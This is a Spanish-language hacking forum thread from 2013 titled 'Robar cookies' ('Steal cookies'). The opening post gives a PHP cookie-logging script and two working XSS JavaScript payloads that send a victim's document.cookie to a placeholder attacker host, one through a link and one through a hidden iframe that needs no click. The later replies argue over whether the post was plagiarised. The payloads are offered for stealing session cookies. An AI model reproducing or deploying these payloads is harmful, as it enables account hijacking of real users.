Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Windero en Agosto 23, 2013, 07:14:41 PM

Título: Robar cookies
Publicado por: Windero en Agosto 23, 2013, 07:14:41 PM

<?php

$cookie 
$_GET['NOMBRECOOKIE']; // Recibimos el valor del parámetro NOMBRECOOKIE
$conexion fopen("cookies.txt""a"); // Abrimos el archivo cookies.txt para escribir al final de él
fwrite($conexion"$cookie"); // Escribimos el contenido almacenado en la variable $cookie
fclose($conexion); // Cerramos el archivo

?>



Ahora bien, esto no sirve para robar cookies. Con este código simplemente escribes el contenido de NOMBRECOOKIE en la URL (es decir, recibirías lo que hay aquí: smileysocultos.webcindario.com/?NOMBRECOOKIE=...valor...
Pero si entras en la página el usuario tendría que escribir su cookie manualmente en el parámetro, y sinceramente hay muchos lammers por el mundo pero no creo que encuentres muchos, y para eso es mejor decirle que te diga la cookie directamente xD

Otra cosa sería que encontraras un XSS  y hagas un enlace malicioso añadiendo la cookie con JavaScript al parámetro:

document.write('<a href="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'">Haz click aquí para...quedarte sin cuenta.</a>');


Claro, también puedes hacer que el proceso sea automático en el caso de encontrar un XSS y que el usuario no tenga que hacer click, simplemente inyectas un iframe oculto y listo:

document.write('<iframe src="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');


Fuente : iDarkHS - http://holoscripter.org/
- Saludos
Título: Re:Robar cookies de cualquier xat
Publicado por: Metadato en Agosto 23, 2013, 07:21:25 PM
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)
Título: Re:Robar cookies
Publicado por: Bruj0 en Agosto 23, 2013, 07:39:46 PM
Buen Post, Jeje yo Hice uno Parecido en DD [DestroyDreams]
Título: Re:Robar cookies de cualquier xat
Publicado por: Windero en Agosto 23, 2013, 07:48:02 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)
Título: Re:Robar cookies de cualquier xat
Publicado por: Metadato en Agosto 24, 2013, 06:22:41 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)

No es cierto, eso que has copiado y pegado es una respuesta del usuario de Holoscripter: iDarkHS,

Deja de rippear.
Título: Re:Robar cookies
Publicado por: Sanko en Agosto 24, 2013, 07:19:48 AM
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Título: Re:Robar cookies
Publicado por: MagoAstral en Agosto 24, 2013, 10:33:51 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!
Título: Re:Robar cookies
Publicado por: Metadato en Agosto 24, 2013, 10:49:50 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!

Totalmente de acuerdo, un saludo compa.
Título: Re:Robar cookies
Publicado por: ANTRAX en Agosto 24, 2013, 10:52:12 AM
Como dijeron mas arriba, este post esta rippeado, y no solo eso, sino que dices que es tuyo?

El post es de iDarkHS: http://holoscripter.org/foro/index.php?topic=571.msg1925#msg1925

Agrega el autor y la fuente y deja de decir que es tuyo.